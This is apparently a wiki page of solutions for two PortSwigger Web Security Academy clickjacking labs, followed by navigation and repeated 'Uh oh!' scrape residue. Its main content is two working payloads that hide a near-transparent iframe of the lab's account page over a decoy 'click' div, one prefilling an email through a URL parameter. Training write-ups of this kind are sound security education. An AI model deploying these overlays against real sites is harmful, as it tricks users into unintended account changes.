Clickjacking

Apprentice lab:
Basic clickjacking with CSRF token protection

Solution

Payload

<style>
    iframe {
        position:relative;
        width:1000px;
        height:700px;
        opacity:0.0001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:515px;
        left:60px;
        z-index: 1;
    }
</style>
<div>click</div>
<iframe src="https://uuid.web-security-academy.net/my-account"></iframe>

Apprentice lab:
Clickjacking with form input data prefilled from a URL parameter

Solution

Payload

<style>
    iframe {
        position:relative;
        width:700px;
        height:500px;
        opacity:0.0001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:450px;
        left:80px;
        z-index: 1;
    }
</style>
<div>click</div>
<iframe src="https://0ad9003504def6cd828decd300f4001f.web-security-academy.net/[email protected]"></iframe>

Note

Always use Chromium from Clickjacking labs!

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

Home

Server-side topics:

Client-side topics:

Advanced topics:

Clickjacking

Apprentice lab:Basic clickjacking with CSRF token protection

Apprentice lab:Clickjacking with form input data prefilled from a URL parameter

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Home

Clone this wiki locally

Apprentice lab:
Basic clickjacking with CSRF token protection

Apprentice lab:
Clickjacking with form input data prefilled from a URL parameter